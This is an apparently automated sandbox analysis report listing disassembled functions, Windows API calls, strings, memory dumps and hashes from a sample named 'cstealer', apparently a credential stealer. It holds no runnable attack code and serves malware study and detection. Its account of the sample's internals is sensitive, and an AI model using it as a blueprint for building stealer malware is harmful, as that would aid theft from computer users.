                                                                                                                                                            • Opcode ID: 8f1df7902dca90666f1b86c52478fd4315f0811391686ba48ec9206ac8c96544
                                                                                                                                                            • Instruction ID: caf8561ee39be7d45f8ebf6057a2f9f58e85b00b84f327dd3758ba610d3db78c
                                                                                                                                                            • Opcode Fuzzy Hash: 8f1df7902dca90666f1b86c52478fd4315f0811391686ba48ec9206ac8c96544
                                                                                                                                                            • Instruction Fuzzy Hash: A8319351B1D78250FA34EB25E9552FA52D1EF99FC0F440472DA4ECA6E6EE2CEA088700
                                                                                                                                                            Function 00007FF6957EE3C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE44D
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE45B
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE485
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE4F3
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6957EE67A,?,?,?,00007FF6957ED5AC,?,?,?,00007FF6957ED1A1), ref: 00007FF6957EE4FF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                                                                                            • Instruction ID: 248c34c777780671a2cd98c86f2d16b7356d4e472cb8582774f00aed7330f07c
                                                                                                                                                            • Opcode Fuzzy Hash: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                                                                                            • Instruction Fuzzy Hash: D0319021B1AB5291EE72DB56A4005F563D4FF45FA0F190975ED5D8A7A0EE3CEA888300
                                                                                                                                                            Function 00000271DC679DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction ID: d69fc1ba0d66717e41ea10154f74b81209c27d9553472f67a68ddac795b43839
                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction Fuzzy Hash: DA31C43121BA40A9EE71DFCAA40876523D4BF48BA0F590E259D1D4BBD5FF38C4678B10
                                                                                                                                                            Function 00007FF6957E8DE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8EA0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                            • Opcode ID: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                                                                                            • Instruction ID: 71e499b9b94657c948a31f1614a3b3f3240f011cbd7f5d477985739610e41015
                                                                                                                                                            • Opcode Fuzzy Hash: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                                                                                            • Instruction Fuzzy Hash: 1C216722B09A5281EB60DB25F5411BAA3E1FB84BC4F584572DB4CD7B79EE3CD9458700
                                                                                                                                                            Function 00007FF6957E8860 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                            • Opcode ID: dd5ac87c9cee46b5c830e3e8782148364abc7e85d8a6069d740a4c3542b67def
                                                                                                                                                            • Instruction ID: 85d18df85464aac1c443ebe9778c8f449eecf70b0528dcef90f87994c5228326
                                                                                                                                                            • Opcode Fuzzy Hash: dd5ac87c9cee46b5c830e3e8782148364abc7e85d8a6069d740a4c3542b67def
                                                                                                                                                            • Instruction Fuzzy Hash: E7213731A0C74281EB209F65F5841BAA3E0EF85FA0F154275DA9D87AE4DF7CD9598B00
                                                                                                                                                            Function 00007FF6957FBF00 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 54b775f8dcc7592bd86d56be8aaa54ab235b08f202956fce910fbbd8e275d41b
                                                                                                                                                            • Instruction ID: 8d7333d430c35ad1ceb9c017db36b4621232edb7877d179c37ea7b4d6f46207a
                                                                                                                                                            • Opcode Fuzzy Hash: 54b775f8dcc7592bd86d56be8aaa54ab235b08f202956fce910fbbd8e275d41b
                                                                                                                                                            • Instruction Fuzzy Hash: 0C216D20B0C61252F679E331965517966E2DF44FB0F244AB5EC3ECBAC6DE2CBE006B00
                                                                                                                                                            Function 00007FF695808D9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction ID: f2252d25c2253d9cc9e163ee02ffa033e2dfd6b0cd0a6ec1ee66d054176521c2
                                                                                                                                                            • Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction Fuzzy Hash: E0118E22A19A6186E3609B22E948369B6E4FB88FE4F004275EE5DC7794CF3CD944CB40
                                                                                                                                                            Function 00000271DC683DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction ID: f414edc7c93a8aa176a3530a7a88ddceb36b409f4f61e8155d53db159c5bb2e6
                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction Fuzzy Hash: 1211B271319B408AE7608F9AE84835A72A0FF88FE4F540625EB5E877D4CF7CC4248B44
                                                                                                                                                            Function 00000271DC672F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction ID: cada6fe809ee421c00d7dbdea2850f4131d446d43a7e9574e8ec3edb93246afd
                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction Fuzzy Hash: F331703270AB51CAEA25DF9AA54876A67A0FF44B84F084D219F4C47B95FF38C4718B00
                                                                                                                                                            Function 00007FF6957E8B80 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetCurrentProcess.KERNEL32 ref: 00007FF6957E8880
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: OpenProcessToken.ADVAPI32 ref: 00007FF6957E8891
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetTokenInformation.ADVAPI32 ref: 00007FF6957E88B6
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetLastError.KERNEL32 ref: 00007FF6957E88C0
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetTokenInformation.ADVAPI32 ref: 00007FF6957E8900
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6957E891C
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: CloseHandle.KERNEL32 ref: 00007FF6957E8934
                                                                                                                                                            • LocalFree.KERNEL32(00000000,00007FF6957E3B4E), ref: 00007FF6957E8C0C
                                                                                                                                                            • LocalFree.KERNEL32 ref: 00007FF6957E8C15
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                            • API String ID: 6828938-1817031585
                                                                                                                                                            • Opcode ID: 8ff8ea2c17bd8fbf586603b6c91de9233eb7c00b5d3dcbaf8731662f4bda8ceb
                                                                                                                                                            • Instruction ID: 5e08b2edcd7b90b3106e641931fa41e3af83a12e6153d8690d6c0342483dc922
                                                                                                                                                            • Opcode Fuzzy Hash: 8ff8ea2c17bd8fbf586603b6c91de9233eb7c00b5d3dcbaf8731662f4bda8ceb
                                                                                                                                                            • Instruction Fuzzy Hash: 2C213021A1974681F630AB20F9056FA62A4FF48B80F8405B2E95DD76A6DF3CEE498740
                                                                                                                                                            Function 00007FF6957FC078 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC0BD
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC0EA
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC0FB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC10C
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC127
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 1d6d34f25b4e15651fb5ef4073e48a7136f047fe8116dc42d62c874e1d236ac0
                                                                                                                                                            • Instruction ID: 70414ad8d0152a2891e433afea7a66586c2445323826c03dfb478e243659893a
                                                                                                                                                            • Opcode Fuzzy Hash: 1d6d34f25b4e15651fb5ef4073e48a7136f047fe8116dc42d62c874e1d236ac0
                                                                                                                                                            • Instruction Fuzzy Hash: 3D114C20A0C65242FA75E735AA551B962E6DF44FB0F2407B5DC3ECB6C6DE2CBD416700
                                                                                                                                                            Function 00000271DC67CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction ID: d63e8eb92f78b0245f8f091d6f6e52048156055828fe7815b4d97f37a9b45724
                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction Fuzzy Hash: F5116D3020F24059FE749FBD954D76922426F587E0F240F24A82E47BDAEE6884618E00
                                                                                                                                                            Function 00000271DC67199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction ID: a82bddac9bbc9b9158c41d4779d08d51c46df858f8042d16c73f8c9134f22247
                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction Fuzzy Hash: FE015B71309A408AEA20DF9AA44C75A63A1FF88BC4F884835DF8D43B95DF3CC559CB40
                                                                                                                                                            Function 00000271DC6736C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction ID: 1d0aed8402332d8e645e6f83485db47a1002e82c96cf3d3817b2469c997b30c0
                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction Fuzzy Hash: 98011BB521BB408AEF349FA9E80C75663A0BF45B86F540C25CA4D077A5EF3DC1688B04
                                                                                                                                                            Function 00000271DC678FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction ID: c55a1298613c4be96f3041dda599e24fdbd12fe273f718f4fd4c77ac03c01cb4
                                                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction Fuzzy Hash: A151A03261A6008EEF24CF59E84CB5937E5FB44B98F508D24DA0A47BCCEB35C862CB00
                                                                                                                                                            Function 00007FF8A48FF1C0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2714325177.00007FF8A48F1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8A48F0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2714275886.00007FF8A48F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff8a48f0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: new[]
                                                                                                                                                            • String ID: :$:$?$\
                                                                                                                                                            • API String ID: 4059295235-1971430616
                                                                                                                                                            • Opcode ID: a64556b63462c90a227d4e7cefc6a6e4c5cb8f667e262823cc78d299466ad490
                                                                                                                                                            • Instruction ID: 0759226cef92bfa4a3a537bf92e830507ac79033d7ef90b13f3c91d30c234311
                                                                                                                                                            • Opcode Fuzzy Hash: a64556b63462c90a227d4e7cefc6a6e4c5cb8f667e262823cc78d299466ad490
                                                                                                                                                            • Instruction Fuzzy Hash: 0E510216F0F682A5FF559BA1B4816BA6791EF84BC8F484072DE4E076B6DFBCE4458300
                                                                                                                                                            Function 00007FF6957E29C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E8770: GetLastError.KERNEL32(00000000,00007FF6957E2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8797
                                                                                                                                                              • Part of subcall function 00007FF6957E8770: FormatMessageW.KERNEL32 ref: 00007FF6957E87C6
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF6957E2AEC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
